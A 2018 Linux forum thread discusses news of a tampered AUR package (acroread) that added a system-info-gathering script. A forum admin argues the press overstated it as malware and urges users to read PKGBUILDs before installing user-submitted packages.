Jump to content


Arch AUR Repo Malware Attack "Hacked"?


  • Please log in to reply
6 replies to this topic

#1 OFFLINE   mhbell

mhbell

    Posting Prodigy

  • Members
  • PipPipPipPipPipPipPipPipPipPip
  • 2,208 posts

Posted 11 July 2018 - 03:35 PM

got this in my email.

Arch Linux PDF reader package poisoned


Malware Attack On Arch Linux AUR Repository; Three Packages Infected So Far - Amateur bid to add code to Arch Linux packages found and squashed - Full Coverage
Registered Linux User #239772
Mint 18.1 Cinnimon, MX-16, Siduction LXQT, Debian Stretch, and Other Linux Distro's
https://pctechman.wordpress.com/

#2 OFFLINE   securitybreach

securitybreach

    CLI Phreak

  • Forum Admins
  • 23,645 posts

Posted 11 July 2018 - 04:21 PM

It's all complete lies. There was not any malware at all, technically it wasn't even malicious. He simply added a systemd timer and script (called xeactor) to gather basic system info. https://ptpb.pw/~x. I wouldn't really call it malware but its a perfect example of why you should read the PKGBUILDS if you install user submitted packages. If someone is stupid enough to blindly install an unofficial app, then they deserve to be infected. Too bad that it wasn't actually malicious.

It was an orphaned pkg (acroread - who even uses it?) and some pleb adopted it, added a timer and script to gather basic system info, which didn't even work.. and then left you a 'compromised.txt' in your home to brag... User was known to devs, known moron who wanted help installing kali.
Posted ImagePosted Image Posted Image
CNI Radio/G+ Profile/Configs/PGP Key/comhack π

"Do you begin to see, then, what kind of world we are creating? It is the exact opposite of the stupid hedonistic Utopias that the old reformers imagined. A world of fear and treachery and torment, a world of trampling and being trampled upon, a world which will grow not less but more merciless as it refines itself. Progress in our world will be progress toward more pain." -George Orwell, 1984

#3 OFFLINE   mhbell

mhbell

    Posting Prodigy

  • Members
  • PipPipPipPipPipPipPipPipPipPip
  • 2,208 posts

Posted 11 July 2018 - 04:30 PM

I figured if anyone would know, it would be you Security. LoL! There is about 5 different Newsletters carrying the story, and they all say the same.
Registered Linux User #239772
Mint 18.1 Cinnimon, MX-16, Siduction LXQT, Debian Stretch, and Other Linux Distro's
https://pctechman.wordpress.com/

#4 OFFLINE   securitybreach

securitybreach

    CLI Phreak

  • Forum Admins
  • 23,645 posts

Posted 11 July 2018 - 04:45 PM

View Postmhbell, on 11 July 2018 - 04:30 PM, said:

I figured if anyone would know, it would be you Security. LoL! There is about 5 different Newsletters carrying the story, and they all say the same.

Honestly, I'm already tired of hearing about it. All these sites using buzzwords to get hits. There was not a single reason to call it malware.
Posted ImagePosted Image Posted Image
CNI Radio/G+ Profile/Configs/PGP Key/comhack π

"Do you begin to see, then, what kind of world we are creating? It is the exact opposite of the stupid hedonistic Utopias that the old reformers imagined. A world of fear and treachery and torment, a world of trampling and being trampled upon, a world which will grow not less but more merciless as it refines itself. Progress in our world will be progress toward more pain." -George Orwell, 1984

#5 OFFLINE   sunrat

sunrat

    Thread Kahuna

  • Forum Moderators
  • 5,588 posts

Posted 11 July 2018 - 09:49 PM

View Postsecuritybreach, on 11 July 2018 - 04:45 PM, said:

Honestly, I'm already tired of hearing about it. All these sites using buzzwords to get hits. There was not a single reason to call it malware.
Maybe the "hacker's" name was Mal? :shifty:
registered Linux user number 324659  ||    The importance of Reading The *Fine* Manual! :D
Posted ImagePosted ImagePosted ImagePosted Image
For the things we have to learn before we can do them, we learn by doing them.

#6 OFFLINE   securitybreach

securitybreach

    CLI Phreak

  • Forum Admins
  • 23,645 posts

Posted 11 July 2018 - 09:59 PM

View Postsunrat, on 11 July 2018 - 09:49 PM, said:

View Postsecuritybreach, on 11 July 2018 - 04:45 PM, said:

Honestly, I'm already tired of hearing about it. All these sites using buzzwords to get hits. There was not a single reason to call it malware.
Maybe the "hacker's" name was Mal? :shifty:

Haha :hysterical:
Posted ImagePosted Image Posted Image
CNI Radio/G+ Profile/Configs/PGP Key/comhack π

"Do you begin to see, then, what kind of world we are creating? It is the exact opposite of the stupid hedonistic Utopias that the old reformers imagined. A world of fear and treachery and torment, a world of trampling and being trampled upon, a world which will grow not less but more merciless as it refines itself. Progress in our world will be progress toward more pain." -George Orwell, 1984

#7 OFFLINE   mhbell

mhbell

    Posting Prodigy

  • Members
  • PipPipPipPipPipPipPipPipPipPip
  • 2,208 posts

Posted 12 July 2018 - 01:01 PM

View Postsunrat, on 11 July 2018 - 09:49 PM, said:

View Postsecuritybreach, on 11 July 2018 - 04:45 PM, said:

Honestly, I'm already tired of hearing about it. All these sites using buzzwords to get hits. There was not a single reason to call it malware.
Maybe the "hacker's" name was Mal? :shifty:
Last Name "Ware" :whistling:
Registered Linux User #239772
Mint 18.1 Cinnimon, MX-16, Siduction LXQT, Debian Stretch, and Other Linux Distro's
https://pctechman.wordpress.com/




1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users